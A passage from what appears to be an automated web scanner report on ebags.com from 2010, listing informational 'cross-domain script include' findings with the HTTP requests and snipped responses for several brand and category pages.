GET /brand/lodis HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:23 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:23 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 112597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.13. http://www.ebags.com/brand/michael-michael-kors-watches previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/michael-michael-kors-watches

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /brand/michael-michael-kors-watches HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:26 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:26 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 106631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

5.14. http://www.ebags.com/brand/quiksilver previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/quiksilver

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /brand/quiksilver HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:13:37 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:13:37 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 59111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.15. http://www.ebags.com/brand/timi-and-leslie previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brand/timi-and-leslie

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /brand/timi-and-leslie HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:15:33 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:15:33 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 67781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.16. http://www.ebags.com/brands/index.cfm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/brands/index.cfm

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /brands/index.cfm HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:03:11 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822; expires=Sun, 02-Jan-2011 14:03:11 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 280160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f/1512/124/1h/
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

5.17. http://www.ebags.com/category/backpack-handbags/20036676 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/backpack-handbags/20036676

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /category/backpack-handbags/20036676 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:07:49 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:07:49 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 111929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

5.18. http://www.ebags.com/category/carry-on-luggage/20048891 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/carry-on-luggage/20048891

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 26 Dec 2010 13:59:10 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
x-version: 10.05.0159.0000
Set-Cookie: SOURCEID=BECOME01%24COUPONID%3D40959822PRODUCTID%3D; expires=Sun, 02-Jan-2011 13:59:10 GMT; path=/
Set-Cookie: ACCT=guest; path=/
Vary: Accept-Encoding
Content-Length: 58367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.net/f
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
...[SNIP]...

5.19. http://www.ebags.com/category/clutches/20036679 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ebags.com
Path:	/category/clutches/20036679

Issue detail

The response dynamically includes the following scripts from other domains:

http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0
http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2

Request

GET /category/clutches/20036679 HTTP/1.1
Host: www.ebags.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RES_SESSIONID=777179002994671; fsr.s={"cp":{"SourceID":"BECOME01$COUPONID=40959822","Splitsession":"STT=ST1|TAT=TT2|","IPAddress":"174.121.222.18"},"v":1,"rid":"1293371750928_590395"}; __cmbU=ABJeb1_iAcEJev5xm-1Yx5FetliJtSAzPLTSaRY3tUw6cenBViNHU0bRyL9i7baplUOkPb-r_gQxunaVoLdpuHy1EmiFf-G6rA; CFTOKEN=39324650; ResonanceSegment=1; ACCT=guest; fsr.a=1293371749552; s_sq=%5B%5BB%5D%5D; SOURCEID=BECOME01%24COUPONID%3D40959822; mbox=check#true#1293371804|session#1293371743230-938821#1293373604|PC#1293371743230-938821.20#1294581345; s_campaign=BEC; __cmbTpvTm=1807; __cmbDomTm=0; s_cc=true; SPLITSESSION=STT%3DST1%7CTAT%3DTT2%7C; s_vi=[CS]v1|268BA4B985158567-40000174A03200FA[CE]; CFID=495108; RES_TRACKINGID=565817218041047;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 26 Dec 2010 14:08:20 GMT
Server: Microsoft-IIS/6.0
ETag: ""
X-Powered-By: ASP.NET
P3P: CP="ALL DSP COR LAW PSAa PSDa IVAa IVDa CONa OUR DELa IND UNI STA"
Pragma: no-cache
x-version: 10.05.0159.0000
Set-Cookie: ACCT=guest; path=/
Set-Cookie: SOURCEID=XSEOGOOG01; expires=Sun, 02-Jan-2011 14:08:20 GMT; path=/
Expires: -1
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 120095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link href="http://a1512.g.akamaitech.
...[SNIP]...
</div>

<script src="http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.unified.min.js?v=2"></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/ShopRunner/shoprunner_init.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.lightbox.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.dropbox.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.easyToolTip.min.js'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.microCart.min.js?ver=1.0'></script>
<script src='http://a1472.g.akamaitech.net/f/1472/124/36h/www.ebags.com/Utils/JAVASCRIPT/eBags.liveclicker.min.js?ver=1'></script>
...[SNIP]...

